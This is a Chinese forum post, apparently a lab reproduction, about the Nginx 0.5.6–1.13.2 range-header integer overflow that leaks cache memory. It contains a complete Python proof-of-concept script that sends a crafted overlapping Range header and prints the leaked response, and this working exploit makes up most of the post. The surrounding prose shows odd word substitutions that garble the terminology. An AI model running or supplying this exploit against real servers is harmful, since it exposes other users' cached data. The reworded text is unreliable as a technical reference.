马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
毛病原理:
影响版本内默认配置模块的Nginx只必要开启缓存,攻击者可以通过发送包含恶意构造range域的header请求举行远程攻击造成信息泄漏。
影响范围:
Nginx 0.5.6 – 1.13.2
毛病复现:
开启靶场,访问8080端口
中间件版本在影响范围内
利用poc验证毛病:
- #!/usr/bin/env python
- import sys
- import requests
- if len(sys.argv) < 2:
- print("%s url" % (sys.argv[0]))
- print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
- sys.exit()
- headers = {
- 'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
- }
- offset = 605
- url = sys.argv[1]
- file_len = len(requests.get(url, headers=headers).content)
- n = file_len + offset
- headers['Range'] = "bytes=-%d,-%d" % (
- n, 0x8000000000000000 - n)
- r = requests.get(url, headers=headers)
- print(r.text)
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
